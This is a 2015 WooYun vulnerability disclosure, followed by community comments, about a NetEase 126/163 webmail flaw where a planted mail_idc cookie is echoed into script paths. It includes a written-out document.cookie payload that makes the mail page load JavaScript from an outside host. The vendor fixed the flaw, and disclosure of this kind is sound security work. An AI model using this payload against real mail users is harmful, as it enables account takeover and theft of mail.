【乌云峰会】网易邮箱XSS ROOKIT

漏洞概要

缺陷编号:WooYun-2015-0127985

漏洞标题:【乌云峰会】网易邮箱XSS ROOKIT

相关厂商:网易

漏洞作者:多多关照

提交时间:2015-07-21 00:41

公开时间:2015-09-08 10:58

漏洞类型:XSS 跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

Tags标签:

漏洞详情

披露状态:

2015-07-21: 细节已通知厂商并且等待厂商处理中
2015-07-25: 厂商已经确认,细节仅向厂商公开
2015-08-04: 细节向核心白帽子及相关领域专家公开
2015-08-14: 细节向普通白帽子公开
2015-08-24: 细节向实习白帽子公开
2015-09-08: 细节向公众公开

简要描述:

163、126均存在此问题。

详细说明:

网易邮箱会将cookie中的mail_idc在源代码中输出,例如,我们在控制台下输入:document.cookie="mail_idc=//xsst.sinaapp.com/poc/mail_idc.js#;path=/; domain=126.com; max-age=9999999";然后登录126邮箱,看源代码,会发现以下内容,build:'6.0b1507151536',now:1437401206072,rootPath:"http:////xsst.sinaapp.com/poc/mail_idc.js#/p/js6/",cacheRootPath:"http:////xsst.sinaapp.com/poc/mail_idc.js#/p/js6/6.0b1507151536/",cacheJsPath:"http:////xsst.sinaapp.com/poc/mail_idc.js#/p/js6/6.0b1507151536/js/",cacheCssPath:"http:////xsst.sinaapp.com/poc/mail_idc.js#/p/js6/6.0b1507151536/css/",cacheImgPath:"http:////xsst.sinaapp.com/poc/mail_idc.js#/p/js6/6.0b1507151536/img/",而cacheJsPath这些变量将会被当作外部JS调用,所以导致加载任意外部JS。

至于如何设置126.com下的cookie,只要找到一个126.com域下的XSS即可。(这里我就不卖这个XSS了,毕竟这种126.com域下的XSS少一个多一个区别不大,留着以后做演示)

漏洞证明:

见详细说明

修复方案:

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-07-2510:56

厂商回复:

漏洞已修复,并对类似问题进行排查,感谢您对网易的关注!

最新状态:

暂无

评价

  1. 2010-01-01 00:00 zeracker 白帽子 | Rank:1028 漏洞数:134)

    原来是你

  2. 2010-01-01 00:00 从容 白帽子 | Rank:153 漏洞数:21)

    原来是你

  3. 2010-01-01 00:00 http://www.wooyun.org/corps/苏州同程旅游网络科技有限公司 白帽子 | Rank:0 漏洞数:0)

    原来是你

  4. 2010-01-01 00:00 杯水 白帽子 | Rank:0 漏洞数:0)

    原来是你

  5. 2010-01-01 00:00 抚琴听海 白帽子 | Rank:0 漏洞数:0)

    原来是你

  6. 2010-01-01 00:00 wefgod 白帽子 | Rank:1438 漏洞数:124)

    原来是你

  7. 2010-01-01 00:00 Let a person cry. 白帽子 | Rank:9 漏洞数:1)

    原来是你

  8. 2010-01-01 00:00 DloveJ 白帽子 | Rank:731 漏洞数:64)

    原来是你⊙﹏⊙

  9. 2010-01-01 00:00 ’‘Nome 白帽子 | Rank:57 漏洞数:7)

    不是香草么?

  10. 2010-01-01 00:00 ’‘Nome 白帽子 | Rank:57 漏洞数:7)

    我其实想看毕姥姥(毕月乌)[email protected]...

  11. 2010-01-01 00:00 Wulala 白帽子 | Rank:201 漏洞数:17)

    终于出来了啊

  12. 2010-01-01 00:00 围剿 白帽子 | Rank:5 漏洞数:2)

    原来是你

  13. 2010-01-01 00:00 _Thorns 白帽子 | Rank:796 漏洞数:60)

    原来是你

  14. 2010-01-01 00:00 冰火九天 白帽子 | Rank:35 漏洞数:3)

    原来是你

  15. 2010-01-01 00:00 ppt 白帽子 | Rank:11 漏洞数:2)

    是你是你就是你

  16. 2010-01-01 00:00 甲鱼 白帽子 | Rank:26 漏洞数:2)

    是你是你就是你

  17. 2010-01-01 00:00 大大灰狼 白帽子 | Rank:144 漏洞数:16)

    幕后黑手

  18. 2010-01-01 00:00 泳少 白帽子 | Rank:158 漏洞数:20)

    原来是你

  19. 2010-01-01 00:00 牛 小 帅 白帽子 | Rank:407 漏洞数:34)

    是我^^^你能把我怎么样^^^^哼哼

  20. 2010-01-01 00:00 ‮ 白帽子 | Rank:10 漏洞数:1)

    执法队已在路上

  21. 2010-01-01 00:00 一只猿 白帽子 | Rank:421 漏洞数:49)

    原来是你

  22. 2010-01-01 00:00 牛 小 帅 白帽子 | Rank:407 漏洞数:34)

    @‮ 好恶心 打出来的字是反的 你还弄个空白名

  23. 2010-01-01 00:00 wanglaojiu 白帽子 | Rank:45 漏洞数:12)

    坐等躺枪

  24. 2010-01-01 00:00 print_0x0000 白帽子 | Rank:68 漏洞数:13)

    原来是你

  25. 2010-01-01 00:00 骸骸 白帽子 | Rank:18 漏洞数:3)

    原来是你

  26. 2010-01-01 00:00 Me_Fortune 白帽子 | Rank:144 漏洞数:18)

    是他是他就是他,我们的好朋友小哪吒

  27. 2010-01-01 00:00 plane636 白帽子 | Rank:137 漏洞数:11)

    原来是你

  28. 2010-01-01 00:00 泪雨无魂 白帽子 | Rank:11 漏洞数:1)

    原来是你

  29. 2010-01-01 00:00 cmxz 白帽子 | Rank:15 漏洞数:1)

    置顶了?

  30. 2010-01-01 00:00 Czzzzzzz 白帽子 | Rank:0 漏洞数:0)

    原来是你

  31. 2010-01-01 00:00 香草 白帽子 | Rank:97 漏洞数:12)

    不是我,哈哈

  32. 2010-01-01 00:00 SunnyDoll 白帽子 | Rank:0 漏洞数:0)

    原来是你

  33. 2010-01-01 00:00 mikecracker 白帽子 | Rank:0 漏洞数:0)

    原来是你

  34. 2010-01-01 00:00 Master 白帽子 | Rank:10 漏洞数:2)

    原来是你

  35. 2010-01-01 00:00 0x 80 白帽子 | Rank:967 漏洞数:111)

    原来是你

  36. 2010-01-01 00:00 虾米 白帽子 | Rank:103 漏洞数:11)
  37. 2010-01-01 00:00 泪雨无魂 白帽子 | Rank:11 漏洞数:1)

    原来是你

  38. 2010-01-01 00:00 大师兄 白帽子 | Rank:0 漏洞数:0)

    大片,后排出售3D眼镜。

  39. 2010-01-01 00:00 Cn-Wolf 白帽子 | Rank:0 漏洞数:0)

    原来是你

  40. 2010-01-01 00:00 haker_t 白帽子 | Rank:10 漏洞数:1)

    原来是你

  41. 2010-01-01 00:00 明月影 白帽子 | Rank:0 漏洞数:1)

    留着做演示

  42. 2010-01-01 00:00 px1624 白帽子 | Rank:963 漏洞数:126)

    额,第一次的访问的就是反射型XSS去修改cookie额。。。。

  43. 2010-01-01 00:00 路人毛 白帽子 | Rank:28 漏洞数:3)

    666

  44. 2010-01-01 00:00 大师兄 白帽子 | Rank:0 漏洞数:0)

    我也留着以后做演示,哈哈